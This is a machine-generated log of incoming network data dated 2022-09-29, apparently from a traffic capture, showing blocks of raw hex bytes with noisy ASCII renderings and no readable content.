                                                                                                                                                            2022-09-29 12:45:15 UTC22661INData Raw: 4a 8e b7 b4 bb 26 1d 27 9b 70 94 b5 70 52 69 43 fd 36 5a a1 41 96 52 0b 26 c0 df 4a 55 65 0a f0 a7 e3 c3 f7 25 50 73 ae b2 27 66 3d ac a9 d8 09 1e 9a f7 09 34 8c df 9e 41 b3 b6 a0 c2 1f fa 5c 56 b8 73 1d e0 03 bd 14 4b 8e 28 13 97 ac b1 47 f2 91 92 de c7 7d f1 27 c5 e0 c3 8e ac 98 87 0a 59 7a 38 41 4d 9e 02 c0 d5 0b ad d5 e2 9f 52 7a c0 a2 2b b2 58 4d b0 f8 66 d9 a2 39 3e fc 3f b2 aa 91 7a dd 8e 19 ed 5d 6d c5 0a 68 c0 1d 07 e4 ed f5 a8 a7 02 88 f5 97 c7 19 bb 4a fb 84 5b 72 bd 89 15 28 3b 34 67 11 7f b6 17 ae 57 c3 8d bf 60 18 0c dd 89 1e a7 35 e1 c3 72 43 ad 57 3b 2c da a2 38 41 57 fb 6a 42 9b ba 33 5b a0 67 d5 e6 d2 4c 48 1f 86 6d 15 db a1 d1 65 7b 70 75 c3 1a 59 93 a3 34 55 3f 60 ae 0a 9c ad 00 d6 56 f0 56 0f 2d bf f2 2b b1 ea a9 09 af 09 8f 4a 88 02
                                                                                                                                                            Data Ascii: J&'ppRiC6ZAR&JUe%Ps'f=4A\VsK(G}'Yz8AMRz+XMf9>?z]mhJ[r(;4gW`5rCW;,8AWjB3[gLHme{puY4U?`VV-+J
                                                                                                                                                            2022-09-29 12:45:15 UTC22677INData Raw: 1c 7a 70 b6 3a 4d da 47 b6 82 c5 ce e2 ad 31 0d d5 9a 89 51 60 00 67 d7 74 cd d9 fe 9f e8 31 d1 58 17 02 1d af e5 cf e3 a0 07 85 5d 29 d2 f7 ee b2 33 b0 77 49 53 36 23 33 9f a5 7b 8c c7 fa a7 a5 df 0f d3 da 01 d6 d6 a6 17 bc b0 e9 23 d2 c1 88 96 49 5b 5a a2 14 72 34 18 56 13 4b ee b8 09 bf 23 ea fe bf 36 17 b5 62 49 fa 1f 49 1e 7b cc 7b 27 72 c8 91 c3 c3 06 9f f5 9a b0 92 dc bd 6b cd 20 51 c4 05 e9 45 dc 5f 22 ee 81 25 dd fe 03 0f 54 5b 8f 58 8e 05 92 05 53 49 c4 c4 fa 09 78 e0 a5 19 1f 65 73 29 6a 72 8f f3 47 9f 76 93 31 b2 39 12 0b 42 b0 2f 7d d1 32 6b 1b d0 01 9f c0 e9 9d eb c9 1c f4 8f e5 6b 85 f1 00 79 51 99 91 f4 6b e5 c2 23 8b b7 83 fb 21 db fe 49 21 d4 e2 74 43 e6 e9 8e 9f df 8e 05 fa 47 5d 90 97 99 3e b0 f7 2a d6 e8 0c 00 85 01 ea eb 9e 2e e4 ef
                                                                                                                                                            Data Ascii: zp:MG1Q`gt1X])3wIS6#3{#I[Zr4VK#6bII{{'rk QE_"%T[XSIxes)jrGv19B/}2kkyQk#!I!tCG]>*.
                                                                                                                                                            2022-09-29 12:45:15 UTC22693INData Raw: a6 1e 27 8b e4 a8 b8 19 d0 b6 a7 f2 b7 e9 25 37 a0 0d db e6 a8 65 3d 78 77 fe 0c fc b7 65 6f a5 6b b5 4a d5 31 f3 08 47 e0 7e b1 a5 ba a1 f1 5e c0 47 fa 41 1e bb 17 c4 2d 0e 02 73 3a df 4c ab 76 8b 38 5f 25 88 e7 0b 68 05 ef e3 0e 30 fd f4 bf 8e da 16 f5 8d 8c 0d a8 09 2c cd ca ab a1 cc eb 8e 60 47 97 55 28 43 aa 90 60 96 ea 2a 80 fe 64 40 d1 a0 76 fd 39 7b d6 58 a8 42 70 10 82 92 50 27 cb ad b2 17 72 6d 34 39 b7 37 a8 93 61 60 93 2f 9a 1a 44 3d e2 62 59 56 0b bd 60 9b 4f e9 d6 df b9 e6 c7 e3 69 1c 53 c8 4a b5 62 42 a2 98 0d 79 34 b7 a3 c7 59 19 ab 7f 12 f6 f0 7a 08 3e a8 d3 7e a8 9a 14 aa 27 52 38 e4 63 1b e3 53 4e e4 e0 ef 86 d8 79 e9 d5 6d bd 76 b8 70 08 99 a2 91 78 4b 70 2b a8 13 56 38 6f ce c5 82 2f fe 47 49 d9 4e ab 7a d6 64 25 20 7a 31 a5 15 25 5b
                                                                                                                                                            Data Ascii: '%7e=xweokJ1G~^GA-s:Lv8_%h0,`GU(C`*d@v9{XBpP'rm497a`/D=bYV`OiSJbBy4Yz>~'R8cSNymvpxKp+V8o/GINzd% z1%[
                                                                                                                                                            2022-09-29 12:45:15 UTC22709INData Raw: fd 72 f0 a3 4c 06 34 e2 5c 6f 66 c5 99 a8 f7 28 93 dd ef 92 bf 41 fe a2 34 05 f5 97 21 4c 36 f7 41 fc c8 30 a5 de 09 ca cc f3 6e b2 ef 01 29 ef 6f f8 b0 0a 27 33 60 8d 0c d0 e6 d0 dc 0a ef 99 40 7a ce 87 23 a5 6f da 0d 54 ca 3c 67 fe 2d cc e8 42 df c0 72 87 02 25 b7 8e 59 3c ca 90 ad 79 f6 46 30 2c 68 6a af bd bb b7 88 ee be 96 89 1c d3 1c 31 b6 4d c6 16 91 37 71 3a a1 26 b6 87 81 3c 6c 58 10 95 d2 85 ce 59 07 f7 04 ad 86 e8 d0 42 27 a7 6a 04 67 24 4a 0d 07 fb 2a 6a c2 ac 10 8d 74 0b 5e 85 b2 60 cf 93 21 88 e9 0c 84 4e a6 58 6a 7a f4 67 e9 f8 97 7b d1 73 d8 66 ff 7a f9 ab 0a 75 a5 fc d5 87 bf 43 aa 5e 64 e2 47 a5 76 c2 99 a9 eb 31 af 1d 03 89 7d 98 34 93 80 e0 67 f1 c7 4f af 8f f9 7d df 4b 08 9a 56 33 5b 44 30 a9 ab 58 f4 16 7e f4 ed 79 d4 88 fc df 17 24
                                                                                                                                                            Data Ascii: rL4\of(A4!L6A0n)o'3`@z#oT<g-Br%Y<yF0,hj1M7q:&<lXYB'jg$J*jt^`!NXjzg{sfzuC^dGv1}4gO}KV3[D0X~y$
                                                                                                                                                            2022-09-29 12:45:15 UTC22725INData Raw: 2d 01 a7 25 ea 7b 51 d7 b8 45 2e 75 a7 3d 29 1c d3 8c ad 7e 9a cf 08 3a 97 e0 ab b4 a2 ad 31 bd 54 fe 03 bc 59 96 ed 6a 97 de d8 0d 80 78 fd bc b9 f2 98 9c 95 4d 06 73 65 1a dc aa 13 32 c0 1a 9f 54 82 71 ad 65 92 de 18 33 09 92 ac 39 8f 52 f9 23 62 a7 58 44 c8 71 64 d5 b1 60 74 f4 c2 b2 16 ba 86 dd 91 01 0d 45 6f 8e 86 95 61 6d 6d 40 d2 3d 04 67 e3 79 84 40 51 79 a1 5d 59 cc ee b6 ef a4 57 34 72 36 98 bc cf cc 68 96 d3 9f d0 8e a9 35 70 0c 89 ef ce 47 88 37 92 af 8d 0f 83 49 9b 7c 4a b8 81 58 0c 14 d0 d1 c7 96 0c 4f 1b 8d 62 92 93 4a 9f 9b d4 d0 7e 45 91 51 8d a9 50 56 b9 f8 7a a3 b8 7b c5 a9 a5 57 83 8c 00 0b 26 6f f9 92 fd 5a b0 7c d4 dc 6b 17 1a 75 3e cf ac 38 96 e9 10 71 6e d3 d0 33 78 75 9e e5 d8 f5 8c 97 10 a4 18 b5 ea e6 4a c9 6f 52 16 5f ee 52 5b
                                                                                                                                                            Data Ascii: -%{QE.u=)~:1TYjxMse2Tqe39R#bXDqd`tEoamm@=gy@Qy]YW4r6h5pG7I|JXObJ~EQPVz{W&oZ|ku>8qn3xuJoR_R[
                                                                                                                                                            2022-09-29 12:45:15 UTC22741INData Raw: da 9b d7 02 1a 1a ac e0 90 1a 49 7a 41 57 1a 38 63 fe 65 d2 7e 7d 52 cf 66 34 d9 55 ef c4 26 49 ba f1 3b 48 d3 90 0e 07 91 0f bb 76 4b 4d 97 20 a3 e3 ed 50 bb 34 53 5c 6d 14 aa 53 e2 8f be 77 21 7d 76 0f 80 d3 ef c8 41 b9 91 7b 4e 38 23 07 77 40 d1 f8 76 f4 f7 cd 0f 6a 1d 78 94 d5 d9 88 2f e4 05 e0 d4 4e 93 18 48 7d 09 29 f7 9d 12 22 97 b9 4c b5 63 21 1f 9c f4 d4 91 f5 6d 43 2f 37 e2 21 d4 d4 c4 01 1e a1 60 05 26 4c 7c 7e cc 0e 4c d3 b6 11 b7 41 69 10 ba 07 ce ae 73 c4 ae c4 0d a3 f4 24 59 e0 83 c1 b6 37 80 7d 39 25 b4 a1 e3 53 43 02 8a 7c 07 07 48 6f c8 c0 6d 3e ef 77 e3 38 4e eb bd fd a4 a1 4f 18 ab e3 db 08 b9 a5 7f 0a 6e 57 78 f4 29 1e e0 60 64 82 33 64 43 4e 56 94 a8 8d 3a e6 cd bf 32 77 9e 2b c3 3d 61 3c b6 7a 3f 00 50 a4 be 45 90 29 5c 95 dd f0 08
                                                                                                                                                            Data Ascii: IzAW8ce~}Rf4U&I;HvKM P4S\mSw!}vA{N8#w@vjx/NH})"Lc!mC/7!`&L|~LAis$Y7}9%SC|Hom>w8NOnWx)`d3dCNV:2w+=a<z?PE)\
                                                                                                                                                            2022-09-29 12:45:15 UTC22757INData Raw: 6a 58 80 e1 b9 2b d7 55 6f b8 60 88 a1 60 3f b2 c1 87 ba 49 72 ad 5c 1b b6 48 2d e0 6d 6a 8f 75 c6 94 88 2c b3 df 6e a2 ef 0a ba 1e de f6 f5 dc c3 fd af dd c5 21 f0 a1 48 47 27 5b f6 73 75 2e e5 c2 1d 56 38 94 24 b0 b4 15 c0 5a 3f f9 4a 0a d5 e6 7b 24 c0 09 d4 8f 6a f9 20 8c 25 e2 c0 51 21 08 ef ee 38 8f 5a 4b ab 99 c0 5b a9 74 92 ac d1 91 3f 49 54 d6 0f 80 a0 1a cd d2 b6 c4 c0 8a 08 65 9d 79 75 31 98 ea 33 82 91 6d 80 33 09 d7 a0 ae ac d5 5a 10 df 24 d0 76 aa 57 6e 39 41 79 14 5c b3 42 1b 4a 87 1f 72 58 0e 0b fd 47 c6 71 a8 e2 b2 05 0e 31 fa 6e d5 1f 8b f6 b8 92 37 6c f1 9a 7b 9e a6 f7 42 48 d0 7c ad cb 4d 80 88 87 44 14 c0 78 ab ce 2d 08 7e c2 86 d4 e3 0a 98 22 7a f5 c3 7a 90 72 ce f2 f3 df ec 49 35 f9 8b d7 df 1b dd 67 be ca 91 07 a9 cb 3a 83 87 f5 84
                                                                                                                                                            Data Ascii: jX+Uo``?Ir\H-mju,n!HG'[su.V8$Z?J{$j %Q!8ZK[t?ITeyu13m3Z$vWn9Ay\BJrXGq1n7l{BH|MDx-~"zzrI5g:
                                                                                                                                                            2022-09-29 12:45:15 UTC22773INData Raw: 7b 50 3f f4 a5 0c e6 f2 70 33 e9 7e 24 6c c8 f0 9a 76 43 e4 86 b5 a5 d6 9a 15 c3 12 03 05 63 bc ae bf 10 2c b6 97 57 4b 19 56 56 e3 b8 44 c2 6f 14 42 23 a5 27 b3 fd bf 04 90 75 ae 42 79 cc db 7a 4f ac 0c 48 0f f1 dc 52 a8 b1 73 17 3e 5c 9d b6 df bb d8 10 ae dc bd 24 fa 82 c1 72 fd fa df de 21 b7 af 5b e5 65 34 0b 20 42 5e e6 96 c0 3c 1f 53 78 fd 3e b1 84 10 23 5c 10 96 1b 75 c6 75 f1 5f 51 d9 3c 41 aa 82 c2 e9 a2 87 f5 66 2a 89 50 c3 03 f1 75 e9 43 2d 7f 35 8e 24 d8 4e b6 08 2e 2c 71 52 95 e0 c8 1a b3 d1 e0 01 52 13 b0 fc 27 fe 8b 1c 80 98 39 5e e3 b0 97 47 b7 1f bb c5 6e d7 c4 2d b6 e7 2b a6 3a b1 90 50 73 ef 8e 0b a9 59 25 5a 5b a5 50 63 cc 4e 2f 15 dc f5 61 22 fc 9d 22 ca 41 bd 02 13 17 96 eb 93 f0 2c 18 76 c7 92 ba ce a9 95 58 02 1a 82 92 fa b4 d0 90
                                                                                                                                                            Data Ascii: {P?p3~$lvCc,WKVVDoB#'uByzOHRs>\$r![e4 B^<Sx>#\uu_Q<Af*PuC-5$N.,qRR'9^Gn-+:PsY%Z[PcN/a""A,vX
                                                                                                                                                            2022-09-29 12:45:15 UTC22789INData Raw: 7b 84 cd 93 a2 50 15 05 b2 9b 36 bf d4 d5 8d a0 1a 22 2f 47 2e 73 9c f5 81 70 94 06 ac 28 1a 30 52 f5 a6 d0 0c 20 37 a5 65 99 e7 49 07 a4 c2 fb 8d 5b b6 db 3c eb 0b f6 87 81 7b 59 54 d6 d1 c8 c8 7d b4 1a a8 48 fe 59 01 a1 7a da d2 8d 56 b6 28 f6 b3 8c 4c 28 5a c7 d2 5f 20 8a c4 85 a6 4a c3 b9 77 14 98 4b 49 b4 9a cb f9 d8 4b fa 27 58 d3 bc 07 d7 01 07 50 27 91 d9 d2 a4 06 e3 6b 76 f2 76 3b ff d9 fd 9a ff 5b 83 36 0f 71 72 6f 8b 0b 0b c6 5d 22 94 5f ef 92 98 76 dd 97 80 81 c7 0a 9c 18 45 d7 88 cd 54 e5 92 e5 0a a8 e5 13 fc f7 57 47 fb 3d 40 cc 63 95 d6 55 28 e8 7b c5 0d 48 c5 00 d9 d4 13 7f e6 8b d0 4c 44 7b 21 15 90 62 d9 be ff 7c f2 97 71 59 d7 ee 8a be 41 a8 f5 11 d7 94 16 6a ef 2f 09 55 71 64 ca 63 47 21 4f a5 14 33 8b 9c af a9 26 bd 94 49 d9 4c 4d 79
                                                                                                                                                            Data Ascii: {P6"/G.sp(0R 7eI[<{YT}HYzV(L(Z_ JwKIK'XP'kvv;[6qro]"_vETWG=@cU({HLD{!b|qYAj/UqdcG!O3&ILMy
                                                                                                                                                            2022-09-29 12:45:15 UTC22805INData Raw: ed 37 5b e9 a0 f0 6e 29 ab 18 37 f6 c0 e4 73 b1 a7 4b 6c 29 2d 7c 33 52 4e d8 e6 f2 77 6e ad 45 6d ea 34 6d 0c a7 f3 70 42 f0 6c 41 27 36 77 e1 89 45 41 0d c2 18 e8 f7 91 55 62 c2 46 7d a4 d4 cc ad b0 51 d2 73 54 25 27 9e 3c 15 fc e9 d6 b6 52 34 2f 83 c0 b6 19 f5 ed b9 9a b4 82 45 c3 51 e7 0d d8 ea fe 4b 39 7b b8 09 1c af ed f1 17 5b 50 cf 74 a6 54 ab bf 12 96 38 ca 13 58 ad 97 eb 62 5d ec e5 67 4f 3a 68 4d a2 53 23 fa 71 16 66 87 e8 41 7c 24 86 37 58 8e 74 74 08 e4 05 bf 29 3e a0 c6 38 4c 03 1f 79 5e 95 7e 0d b4 8d 0c 00 ff b6 6c 06 dd 00 ae ba 8d 80 58 5f c8 80 37 d0 5d 20 e3 7f ff 3c 79 7b bd dc 0d d1 f8 5c d6 30 dc f7 9d 44 0c 4e 9c f3 64 e8 3e 32 1e 76 f6 99 54 8a 89 8c 45 8d 54 22 9b 5f f3 e9 6e 60 6f 78 c7 b0 77 c4 92 df fc 52 79 d0 1b e5 88 bd 60
                                                                                                                                                            Data Ascii: 7[n)7sKl)-|3RNwnEm4mpBlA'6wEAUbF}QsT%'<R4/EQK9{[PtT8Xb]gO:hMS#qfA|$7Xtt)>8Ly^~lX_7] <y{\0DNd>2vTET"_n`oxwRy`
                                                                                                                                                            2022-09-29 12:45:15 UTC22821INData Raw: d4 05 ae 07 55 ec 29 81 10 bc 2b 80 d5 f8 02 bb 43 ad 92 4d 11 ec 6b 9b df 57 d4 3b db 60 40 37 26 cb 4a 4e 8e 34 f2 81 1b ea 2d c3 3b 02 f1 0f cb 21 72 db 13 78 a8 74 a5 5b b7 3b 9d 60 7d f2 90 b0 e6 ed 22 51 3b 7d 96 33 31 a4 c1 47 22 6c af b3 ab c5 0a 5a 93 3d 1e fe f9 16 73 c1 82 74 a7 75 5a 5e 92 af 42 aa 90 f1 41 64 bf ab bb 34 75 66 40 31 86 94 cf e7 0b 27 d3 01 26 1f da 92 7a 35 30 b3 31 1c 88 65 5a 27 25 2b c9 82 3d 2e 35 db 75 97 90 e0 74 30 ca 30 a2 1b fd 29 c0 62 5d 26 47 33 6f e6 36 e1 d3 f6 d3 2c b6 82 dd f8 d1 14 ec aa 48 1e b6 6c 47 c3 9b 76 7e b8 7d 5f 4e c6 5a e3 a8 19 f3 f3 ee 85 06 25 2f bd 17 8c 30 eb 03 ac 2e a8 d4 f1 ec 90 38 29 47 8b 34 d8 18 af 4d fb 6e f7 a8 74 7d 10 56 09 6c e8 f9 fe ef 3d df 86 73 dc fe f5 8a f9 9e 58 43 55 ec
                                                                                                                                                            Data Ascii: U)+CMkW;`@7&JN4-;!rxt[;`}"Q;}31G"lZ=stuZ^BAd4uf@1'&z501eZ'%+=.5ut00)b]&G3o6,HlGv~}_NZ%/0.8)G4Mnt}Vl=sXCU
                                                                                                                                                            2022-09-29 12:45:15 UTC22837INData Raw: 23 ea d0 f2 6b 55 a7 8f 26 20 b3 9c f6 8c 63 b7 83 0f 54 ec 6f ae fd fc e1 0b 92 e4 c5 8d 92 f0 4c 41 59 72 8a 45 25 12 75 5f bf 57 a6 6d 18 d5 72 5c e3 fa cd ff 61 31 bc 12 9b b6 7f 24 8d a4 ef 66 18 ea 28 48 73 f1 85 d6 52 ba d6 72 6b ba a9 3e 34 0f ca 04 c8 bf 15 0d 50 24 0d 60 c6 0f 92 34 e7 0a f9 3e d7 43 e8 d8 7f e5 7f bb 16 a8 bb f4 c2 a9 b1 f5 fd 4d f9 07 f5 46 1a 16 8a ad 5a b5 d3 1e f1 8e 72 61 35 1f fa d8 88 b1 19 5c 95 ce c7 e3 3e 7b ab 29 26 e9 87 e5 26 eb 77 0b d2 83 c9 b1 95 3f d7 36 e1 ad 98 2d 1e cc e6 02 3c fb 66 5e bc e7 6c 65 20 25 c3 df d1 79 1d 2d ed 4b cc 03 b1 f4 91 7b 30 ec ac e0 b8 b5 fa 9c e9 91 78 10 a5 11 2a 25 dd d9 ac 8b ea eb da df e3 7c 0e 0f d8 89 66 70 9c c6 dd a5 58 44 3a 14 1a 8e bf f3 47 c7 4d d5 4a 8c 17 e7 d8 46 b9
                                                                                                                                                            Data Ascii: #kU& cToLAYrE%u_Wmr\a1$f(HsRrk>4P$`4>CMFZra5\>{)&&w?6-<f^le %y-K{0x*%|fpXD:GMJF
                                                                                                                                                            2022-09-29 12:45:15 UTC22853INData Raw: 53 2f d0 e9 9d c3 26 10 fd 7b 0d 5a 32 d2 df 3f 0c a0 a5 05 4d 1d 10 43 da 27 0f 61 a8 13 6d 01 1c 50 63 02 0e cc 79 15 9f f9 a6 44 aa 31 e9 af 50 98 d0 f1 8e e3 74 03 09 2d 6c 28 20 1e de 68 16 c3 af ac e9 50 9e f9 fd 97 3c 1a ba f6 2e dd 5f 49 54 6b 61 53 b9 40 7c 0f d1 70 75 2f 6f 21 fe 66 4d e6 48 c4 85 78 8e bb ce 6d 78 84 08 65 ca 5f 8c f8 00 97 4f e3 63 27 52 c8 13 97 7e dd 6b 8d b5 16 80 a3 e7 ed 04 16 36 f7 01 38 c8 11 f4 85 ed ce 99 20 4c dc eb d1 71 49 b0 12 4a 91 67 7f 9e 1b 89 a0 6b 63 39 db 78 f5 ca 66 97 4e f5 77 18 0a 89 e8 a1 b9 7d 10 ed 0d 99 06 70 c6 82 52 80 a4 f8 5d a7 70 1c 06 e5 c1 74 76 3b 29 5e 97 b5 35 32 9a fd 00 3b 53 fb 3a 24 0c 26 35 c2 39 0f 50 f6 ad c8 ca d2 e6 cd fa 53 3d cc b0 53 bc de e3 0a ba 06 c4 f1 55 6a 3e 1f 45 df
                                                                                                                                                            Data Ascii: S/&{Z2?MC'amPcyD1Pt-l( hP<._ITkaS@|pu/o!fMHxmxe_Oc'R~k68 LqIJgkc9xfNw}pR]ptv;)^52;S:$&59PS=SUj>E
                                                                                                                                                            2022-09-29 12:45:15 UTC22869INData Raw: e1 52 c7 9f b6 01 ef 46 a1 81 75 ee ba 56 ee ce cc 57 45 3c aa 7e f9 88 39 d7 c9 5b 50 51 04 63 e9 e1 3b 79 f5 0d 78 9f f4 ff 1c 04 54 3a 9e 4b 54 3d 95 25 6f 82 b7 2c 21 17 ff 62 cd 38 27 84 56 80 01 e9 23 da d9 0d 37 16 f3 d5 f5 c4 34 ca 5f 64 1e d0 9f 2a f1 69 75 66 86 f0 13 54 39 91 d1 d9 46 af f4 41 f2 75 b2 60 f5 38 24 5a df ad 0c f1 ae 71 bf 96 4a b3 dc ce 82 a3 c5 03 09 3a 40 d4 99 99 7b 41 fe bd de b7 1d e6 07 14 81 65 18 b8 43 ee 6f fc e9 e4 e5 ee 05 89 4b ce d8 62 61 9e 81 bb 1a 32 91 f2 b2 63 8e 62 ab 31 1b 3d 42 0a 45 87 a8 56 88 4a e8 df f7 cc 9e 56 53 bb 81 70 5c ec 11 17 27 e0 46 2f 97 e7 33 27 4a 8f 53 3c a9 3b 7f 49 c6 84 fd 00 37 91 bb 0c f8 a0 73 b5 ea b1 c3 55 b3 26 b0 c6 67 19 b6 43 37 79 8a d6 c4 bf 1e 3f f2 56 31 99 a9 78 08 1b fc
                                                                                                                                                            Data Ascii: RFuVWE<~9[PQc;yxT:KT=%o,!b8'V#74_d*iufT9FAu`8$ZqJ:@{AeCoKba2cb1=BEVJVSp\'F/3'JS<;I7sU&gC7y?V1x
                                                                                                                                                            2022-09-29 12:45:15 UTC22885INData Raw: 71 94 e3 5c 54 ef fd 6c 3e 3c 46 ea 49 b9 b4 cd cb 81 2b a7 92 0f 76 e1 7e 95 9d ca 68 16 1f b8 93 c9 0c 64 4f 1b 91 52 4a 50 53 1c 85 83 24 12 9c 02 80 78 4a 20 ad e0 50 fa 6b 6d 57 75 49 f7 85 a6 5d b6 6b 3c 47 b0 13 c1 4a f9 12 0e a8 33 d2 23 b5 c5 6e 28 83 ce 72 3d 8b b6 d3 e5 4b 90 64 d2 dc a9 f2 2d d7 e9 cf c0 cd 85 f3 6a 0f 0c 5b 66 eb 41 17 19 f5 c8 21 ab 09 53 d2 0d 5f 5e 4a 3c a0 10 73 05 7b 9d 3e d8 1f e4 8d 27 f2 fb 15 1f 0e c8 e5 a9 a7 08 d0 cb a3 78 77 05 b0 b1 d6 8c 3f e3 db 5b c4 ae 96 00 c9 49 3d 88 7c dd 52 69 f8 4a 3c 04 31 7b 02 87 ee df 1c 83 d4 7e 6a c2 2a c0 f6 d6 1d 16 f9 f3 93 c7 2e 76 b3 58 02 ef 85 c2 41 94 65 8f 14 54 6e f1 22 3c 4a 54 ea 22 39 9a b0 f0 85 46 2e c1 7b 9d 60 e5 3c 9b 3a 4d 9e bc 1a 5e eb 9e cc 9c 65 fb 5c 2a 1a
                                                                                                                                                            Data Ascii: q\Tl><FI+v~hdORJPS$xJ PkmWuI]k<GJ3#n(r=Kd-j[fA!S_^J<s{>'xw?[I=|RiJ<1{~j*.vXAeTn"<JT"9F.{`<:M^e\*
                                                                                                                                                            2022-09-29 12:45:15 UTC22901INData Raw: 2d 26 57 de 45 43 a7 37 75 12 19 90 48 74 65 97 39 1e 7b cb 7e 5f 85 46 e8 66 68 b8 f7 b8 79 6f 04 68 f2 9e dc 3c f1 91 c9 65 6f 9e 43 67 a4 c7 ca 7b 81 5e 1a f5 e1 a9 9a b5 ec 0d 9e d8 5e 47 f3 0f 0c c2 ec 4b e5 71 3b 06 b7 fd c8 16 b0 03 e5 48 65 cd 6d 8a aa c8 60 4e 35 b7 2b f7 cf ac 27 97 88 2b f1 63 dd 29 99 7b f4 f5 29 df 7d c1 cc e0 db d6 89 19 5f 90 1e 95 4c 8c 9c f4 69 18 b1 3e 1e 7a 70 34 34 8e c3 08 81 0f 1e 15 7c 93 fb b7 cc ca c0 39 3b 7e ce ad 7f 4a 80 ac bc 5f 33 9c 2c c7 fe f0 3a fd cf 82 68 31 8a 08 02 d4 1e 91 05 a3 25 db 61 24 94 e4 46 d0 6e 89 54 88 8d 41 a8 51 59 87 17 49 32 34 62 7f 00 69 ce 07 02 42 07 a7 b8 6e 0f 8f b0 76 8d f7 be b0 23 92 db 2b 4b 34 61 57 d1 47 19 65 10 f1 f6 9f 9f a0 7f e8 07 02 01 3a bd 86 39 e2 d1 ce 6d f2 ed
                                                                                                                                                            Data Ascii: -&WEC7uHte9{~_Ffhyoh<eoCg{^^GKq;Hem`N5+'+c){)}_Li>zp44|9;~J_3,:h1%a$FnTAQYI24biBnv#+K4aWGe:9m
                                                                                                                                                            2022-09-29 12:45:15 UTC22917INData Raw: b6 f5 32 a0 a9 ed 19 49 5f 7c e0 b6 af 35 28 72 1a 7a 3c a0 e3 2d 75 8a 15 1b 54 85 c6 35 bf 16 23 2e 17 22 18 02 aa 3f 76 d4 a6 cd 8c 38 19 89 bb c4 5a 7e 0f e3 2d fc 4b 4b c1 ed 0d 18 e8 54 bb 8a fc 3a 63 7a 51 50 5b eb 9a 1b 99 79 9d cb 0d 2b 90 2b ab f0 79 19 02 1f 5e 6e fd 53 bc 6a 57 1c 11 aa 62 c2 2b 49 87 e3 fd 5f 44 d3 b5 fd e5 fe 62 7c 4f 8e 81 08 9f 7a fc 77 e4 ee f9 d2 46 8d 1f c8 fd 02 a2 ea e6 f1 89 4d 7f 47 32 87 fe 16 5a a0 cc 57 de 2e a5 d3 ba 09 1e 77 72 49 6e 4c b4 90 7f 16 d8 17 72 6c 1c b0 75 ef ff 0d 36 ba 67 3d ad b0 a4 92 77 86 40 91 20 bd 75 39 d7 4b 86 af 91 eb 1a 5c 36 91 82 02 4a 04 30 87 8a 7e e0 f5 8b 49 b4 2f 91 b0 10 fa c3 39 da a1 7e 61 f5 5f f2 ab 92 26 d5 47 d6 07 d3 dd 9f 7b a6 07 01 17 04 54 1f 16 7b a7 1b a7 4e dc 63
                                                                                                                                                            Data Ascii: 2I_|5(rz<-uT5#."?v8Z~-KKT:czQP[y++y^nSjWb+I_Db|OzwFMG2ZW.wrInLrlu6g=w@ u9K\6J0~I/9~a_&G{T{Nc
                                                                                                                                                            2022-09-29 12:45:15 UTC22933INData Raw: aa 5a bf 65 b1 46 01 5d 03 5d 1c 9a 67 75 e7 c9 13 a2 a9 2e 60 d5 9a 33 44 f8 61 f6 53 5b 1e c7 c2 2f ba c8 a0 c3 e2 5f ad 43 02 78 46 ca 34 82 71 89 d1 0c da 12 69 79 96 7d c2 3f f2 fa a9 a6 b3 b5 a8 45 5b 7c cb 68 79 b7 26 43 41 f3 a7 25 1e 84 8e fd 9b 75 5a 1c 73 e6 0e e1 67 06 55 57 42 14 1a 0a 79 af f1 f0 02 d2 2c a3 f1 64 c8 00 06 32 87 88 cf 90 9d ce 77 c0 78 d9 bb 0c 34 3d 53 8f 00 d7 66 a3 fd 38 86 be 26 36 a4 98 47 09 ce cf c1 5e 69 93 10 dc 1e 24 6a 97 ea d5 70 7f 62 2b be 5f cf 21 37 a0 f9 0d 16 2b 81 7d d0 9e a1 76 eb 76 fa 4e 08 05 10 15 29 27 b6 e8 a1 7d 3f 72 64 b8 9e 17 f3 f9 86 02 55 a4 4b 25 f7 1f 78 6d e2 0d a6 4a 1b ba c4 65 f8 8b e0 39 cc ff 11 9c 7c 60 e7 00 04 c7 10 af 16 4a 43 ec 50 f5 d1 56 c2 82 57 f9 d6 f2 1b cb fb 51 1f bf db
                                                                                                                                                            Data Ascii: ZeF]]gu.`3DaS[/_CxF4qiy}?E[|hy&CA%uZsgUWBy,d2wx4=Sf8&6G^i$jpb+_!7+}vvN)'}?rdUK%xmJe9|`JCPVWQ
                                                                                                                                                            2022-09-29 12:45:15 UTC22949INData Raw: d2 96 74 18 a5 09 34 8f 72 6c a8 05 bf 46 8d 13 2f e4 9b 5a af f5 80 7d c3 e4 47 b7 bf 09 c0 bf 20 b8 bd d6 21 f6 5b 22 71 81 c1 7b 31 50 54 14 35 1b 49 7d 50 68 34 23 76 84 23 18 86 04 5e 28 82 94 58 92 04 68 11 af ad 00 0b 88 d0 d2 4e 93 90 ac ab 83 4a 3c 58 90 e4 82 7a 55 97 fb 1f 03 0f 47 a7 12 dc 1e 7d 9b 1e b5 1f 3f 92 eb 09 b6 6e b1 05 4e a3 ea 92 72 0f 0c 12 31 58 29 61 95 97 1e db 4c 8e c9 31 2b d1 1e c1 6f 47 bb c0 07 69 55 61 ee c6 9d 9b 54 65 56 71 1e bf 3a 64 d0 2b 98 e8 2c 36 c5 e2 d6 25 35 e0 1c 6f 0a 94 1c 84 db 97 1a 80 61 5a e1 fb 19 03 b8 4c 6a 31 bb 15 e3 6b 48 10 a2 f2 aa 99 b1 dc a0 32 0f d4 10 64 bb 7a db 0e 17 59 28 b4 55 c8 c7 13 82 5e a3 d4 7c c3 dc 59 ec 58 9c 32 81 b1 bb a2 14 a9 76 a7 b8 6a a4 e4 dd 1b ad dc 48 f2 47 29 89 4a
                                                                                                                                                            Data Ascii: t4rlF/Z}G !["q{1PT5I}Ph4#v#^(XhNJ<XzUG}?nNr1X)aL1+oGiUaTeVq:d+,6%5oaZLj1kH2dzY(U^|YX2vjHG)J
